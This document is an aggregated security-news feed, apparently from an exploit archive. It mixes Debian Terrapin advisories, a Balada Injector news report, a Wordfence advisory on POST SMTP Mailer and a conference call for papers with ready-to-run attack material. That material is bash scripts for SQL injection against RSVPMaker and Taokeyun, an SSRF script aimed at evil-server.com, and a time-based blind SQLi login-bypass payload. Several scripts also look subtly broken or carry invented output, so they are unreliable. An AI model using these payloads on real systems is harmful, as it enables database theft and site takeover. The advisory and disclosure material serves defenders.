WordPress RSVPMaker plugin versions 9.3.2 and below suffer from a remote SQL injection vulnerability.

    #!/bin/bash# Set the URL of the website running the vulnerable pluginurl="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"# Set the number of columns in the querycolumns=5response=$(curl -s "$url")query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')payload="' UNION SELECT 1,2,3,4,5-- "# Test the query with different numbers of columnsfor i in $(seq 1 $columns)do  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"  if [ $? -eq 0 ]  then    echo "Vulnerability confirmed with $i columns"    break  fidone

WordPress RSVPMaker 9.3.2 SQL Injection

Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability.

Change Mirror Download

    #!/bin/bash# Variablesurl="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"# Construct the requestrequest="POST $url HTTP/1.1\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: $((${#cid}+15))\r\n\r\n"request+="$cid"# Send the request(echo -e "$request") | nc example.com 80

Taokeyun SQL Injection

HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.

    #!/bin/bash# Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit"# Send the malicious requestresponse=$(curl -s -X POST -d "$payload" "$target_url")# Check if the exploit was successfulif echo "$response" | grep -q "Exploit successful"; then    echo "Exploit succeeded"else    echo "Exploit failed"fi# Example payload and responsepayload="url=http://evil-server.com/exploit"response="HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Dec 2024 20:23:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 25Connection: keep-aliveExploit successful"

HaoKeKeJi YiQiNiu Server-Side Request Forgery

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.
First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech

Website Security / Vulnerability

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called **Balada Injector**.

First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.

The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

"When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users," WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox\[.\]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

"The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page," Sucuri researcher Denis Sinegubko noted last year.

"So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface."

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin ("wp-felody.php" or "Wp Felody") so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name "sasas" to the directory where temporary files are stored, and is then executed and deleted from disk.

"It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account," Sinegubko said.

"Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

Debian Linux Security Advisory 5601-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5601-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php-phpseclib3CVE ID         : CVE-2023-48795Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that theSSH protocol is prone to a prefix truncation attack, known as the"Terrapin attack". This attack allows a MITM attacker to effect alimited break of the integrity of the early encrypted SSH transportprotocol by sending extra messages prior to the commencement ofencryption, and deleting an equal number of consecutive messagesimmediately after encryption starts.Details can be found at https://terrapin-attack.com/For the stable distribution (bookworm), this problem has been fixed inversion 3.0.19-1+deb12u2.We recommend that you upgrade your php-phpseclib3 packages.For the detailed security status of php-phpseclib3 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php-phpseclib3Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmWg5QQACgkQEL6Jg/PVnWRUKwf/QGg/4t/cvkkj4MAEJs5GLxmT/UpIUdhEMjVtpVZk6k6m9K/OK3/3EXuTXYtNhIyByOiWpLt5kMBrG9I5tz6/ffErfiPYYJso7fWyAaWKopFp0qsYGe8FDq0aVSKo51b+SHPDtMxCxahTdkegaSCpjaEFiWZNd0/h4ZvS3ZNuOFQXcPor+mTIHqJTPkkpsMm9Qg7skmDrrlENLvDRgXn8HuJa0h2+vhNnSwfC/cTDKPICeOozB4qMWu4QYzlMSKC/mLJIVlqmVufQndnHLYlKLexusiCCckn/B/irOS5FRrOkXqfPmOtgpC9eDLhP7y/CkMhwhR6Ty/oOR/62zhhZpg==/Vah-----END PGP SIGNATURE-----

Debian Security Advisory 5601-1

Debian Linux Security Advisory 5600-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5600-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php-phpseclibCVE ID         : CVE-2023-48795Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that theSSH protocol is prone to a prefix truncation attack, known as the"Terrapin attack". This attack allows a MITM attacker to effect alimited break of the integrity of the early encrypted SSH transportprotocol by sending extra messages prior to the commencement ofencryption, and deleting an equal number of consecutive messagesimmediately after encryption starts.Details can be found at https://terrapin-attack.com/For the oldstable distribution (bullseye), this problem has been fixedin version 2.0.30-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.0.42-1+deb12u1.We recommend that you upgrade your php-phpseclib packages.For the detailed security status of php-phpseclib please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php-phpseclibFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmWg5P4ACgkQEL6Jg/PVnWTO8Qf+MjlqXFJ0p865PgV30sQmWeJmc8UiX/lOO9ayLUZ13Dj4z74H40XxAz0MrHDnpfs3hvtgTkdRkE+k2FvrMgau+EpN1eGwgrHURHN/Kdz9Z6YLQX/T8LZq97SZVVu/X/+xkiZng0J+UXZx5BWQFf/vGz5vLiPA3JUSgS3KjwOYiZKIaSf+/7SF48heQTucpa7nC/7ew4dgLLNTa9PQWK8C616cJ6iZZaowi8k3QmUQGkyhuXS0EUHHRkxqEEf7HccwpwYbPAAkh5cIckEoXEC2gUkl2UmpzCFNdJl/xqz02xOfcgoDxM/1bYy2Bn3cNLe681fmEd7ShPdNTYtqz6YvwQ==ZVcV-----END PGP SIGNATURE-----

Debian Security Advisory 5600-1

Debian Linux Security Advisory 5599-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5599-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : phpseclibCVE ID         : CVE-2023-48795Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that theSSH protocol is prone to a prefix truncation attack, known as the"Terrapin attack". This attack allows a MITM attacker to effect alimited break of the integrity of the early encrypted SSH transportprotocol by sending extra messages prior to the commencement ofencryption, and deleting an equal number of consecutive messagesimmediately after encryption starts.Details can be found at https://terrapin-attack.com/For the oldstable distribution (bullseye), this problem has been fixedin version 1.0.19-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.0.20-1+deb12u1.We recommend that you upgrade your phpseclib packages.For the detailed security status of phpseclib please refer toits security tracker page at:https://security-tracker.debian.org/tracker/phpseclibFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmWg5PMACgkQEL6Jg/PVnWS6iwgAgCFsThzoeNHG05PouaajhL6LvGsrj+cwed14VEnr0TGpChD6y2Z/deZXHW86VXSHRZvqNTt7+UQvKUwrmvbNRZL3TQoTp9l+VKtn3wT/0Q6Zf1jsn4G+yffXdredHf2pXgJh9poEy2DUTunVF+vpZdp9fS2QY8xp24kNbk8kk6itJeOGueWoFwrZp1B5q2hnQdFtM8mhbXDzViqbiu6zVZOmSXri1jShAKRDl0kpRQvfP1mKE+j5RMoJkBGFGuWnIXvxtwQEYDvobgKk5Ie0yzwqnD6m3WXMeS9x4Zi+HvV3hXvEu0UvvQXC1z8VX31cFffkLLDFpO3cE9dQlyABBA==Rz3N-----END PGP SIGNATURE-----

Debian Security Advisory 5599-1

Copyright Loan Management System 2024 version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 01/12/2024## Vendor: https://twitter.com/razormist## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter is vulnerable to SQL injection attacks. Thepayload ' was submitted in the password parameter, and a databaseerror message was returned. Also, the attacker can bypass the loginform and log in to the system as an administrator using thisvulnerability SQLi bypass authentication.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)## Time spend:00:35:00

The call for papers for Hardwear.io USA 2024 is open. It will take place May 31st through June 1, 2024.

    Call For Papers for Hardwear.io USA 2024 is OPEN!SUBMIT your #hardwaresecurity research now: https://hardwear.io/usa-2024/cfp.phpDeadline for submission: 15 February 2024Conference: 31 May - 1 June 2024, Santa Clara, USADo you have a groundbreaking embedded research or an awesome open-source tool you always wanted to present? What are you waiting for?Share your research findings with the Hardware Community by becoming a speaker!Welcome to the 6th Edition of Hardwear.io USA, fasten your seatbelts for intensive in-person trainings, top-notch hardware-security talks, professional networking, stimulating CTFs, and a challenging HardPwn.Research Submission Categories:1. New Research: A research topic that has not been presented/published or is not going to be presented/published before Hardwear.io USA 2024.2. Current Research and Workshops: Comprises known security issues, new research presented/published elsewhere, case studies, twist to existing research, vulnerability, exploit, or research-in-progress.3. Tool Category: Comprises open-source security tools, exploits, hardware, etc. This is an excellent opportunity for the original authors to showcase their work to the world.Speaker Benefits: https://hardwear.io/usa-2024/cfp.php <https://hardwear.io/usa-2024/cfp.php>We are interested in new and cutting-edge security work that has previously not been published. Some security topics for your reference include (but are not limited to):Internet of Things / Smart Devices | Embedded Systems & Cryptography | Industrial Control Systems / SCADA | Satellite Systems | Hardware Firmware | Hardware PentestingReach out to cfp@hardwear.io for any further questions. Thank you!"

Hardwear.io USA 2024 Call For Papers

WordPress POST SMTP Mailer plugin versions 2.8.7 and below suffer from authorization bypass and cross site scripting vulnerabilities.

Vulnerability Summary from Wordfence Intelligence

Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Authorization Bypass via type connect-app API 

Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress

Plugin Slug: post-smtp

Affected Versions: <= 2.8.7

CVE ID: CVE-2023-6875

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher/s: Ulyses Saicha 

Fully Patched Version: 2.8.8

Bounty Awarded: $4,125.00

The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.

Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Unauthenticated Stored Cross-Site Scripting via device 

Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress

Plugin Slug: post-smtp

Affected Versions: <= 2.8.7

CVE ID: CVE-2023-7027

CVSS Score: 7.2 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Researcher/s: Sean Murphy 

Fully Patched Version: 2.8.8

Bounty Awarded: $825.00

The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Technical Analysis #1: Authorization Bypass via type connect-app API

The POST SMTP Mailer plugin helps configure an SMTP mailer in WordPress, replacing the default PHP mail function to improve email delivery. In addition, a mobile application can be connected to the plugin using a generated auth key. Examining the code reveals that the plugin uses the connect_app() function in the Post_SMTP_Mobile_Rest_API class to save the mobile application connection settings.

[View this code snippet on the blog] 

Knowledge of a randomly generated authentication nonce is required in order to set the value of the FCM token. However, the plugin deletes the auth token in all cases. This means that after sending the request, the auth nonce is always empty. This made it possible for the attacker to set the FCM token in the next request, providing a zero value for the auth key which would successfully validate as true.

With the connected application, it is possible to access and view all emails, including password reset emails. This can be used for complete site compromise by an attacker triggering a password reset for a site’s administrator user, and then obtaining the password reset email through the log data. Once an attacker has access to this key, they can reset the password for that user and log in to the account.

Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.

Technical Analysis #2: Unauthenticated Stored Cross-Site Scripting via device

In the same connect_app() function of the plugin, the mobile application connection settings include the device value. Examining the code reveals that a sanitization function is missing at the device value input in the connect_app() function, and escaping is also missing at the output in the section() function.

[View this code snippet on the blog] 

This makes it possible for unauthenticated attackers to inject arbitrary web scripts, which will execute whenever an administrator opens the mobile application settings page. As with all Cross-Site Scripting vulnerabilities, this can be leveraged by an attacker to achieve remote code execution.

Wordfence Firewall

The following graphic illustrates how the Wordfence firewall prevents an attacker from successfully exploiting the authorization bypass vulnerability.

post-smtp-mailer-authorization-bypass-howto-wordfence-firewall 

Disclosure Timeline

December 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion for a separate vulnerability in the plugin.

December 14, 2023 – We receive the submission of the Authorization Bypass vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.

December 15, 2023 – We validate the report and confirm the proof-of-concept exploit.

December 15, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.

December 19, 2023 – We receive the submission of the Stored Cross-Site Scripting vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.

December 20, 2023 – We validate the report and confirm the proof-of-concept exploit. We send over the full disclosure details for the unauthenticated XSS.

January 1, 2024 – The fully patched version, 2.8.8, is released.

January 3, 2024 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.

February 2, 2024 – Wordfence Free users receive the same protection.

Conclusion

In this blog post, we detailed an Authorization Bypass and a Stored Cross-Site Scripting vulnerabilities within the POST SMTP Mailer plugin  affecting versions 2.8.7 and earlier. The Authorization Bypass vulnerability allows unauthenticated threat actors to reset the API key used to authenticate to the mailer and view logs, including password reset emails, resulting in a full site compromise. The Stored Cross-Site Scripting vulnerability allows unauthenticated threat actors to inject malicious web scripts into pages. The vulnerabilities have been fully addressed in version 2.8.8 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of POST SMTP Mailer.

Wordfence users running Wordfence Premium , Wordfence Care , and Wordfence Response  have been protected against these vulnerabilities as of January 3, 2024. Users still using the free version of Wordfence will receive the same protection on February 2, 2024.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

Tag

#php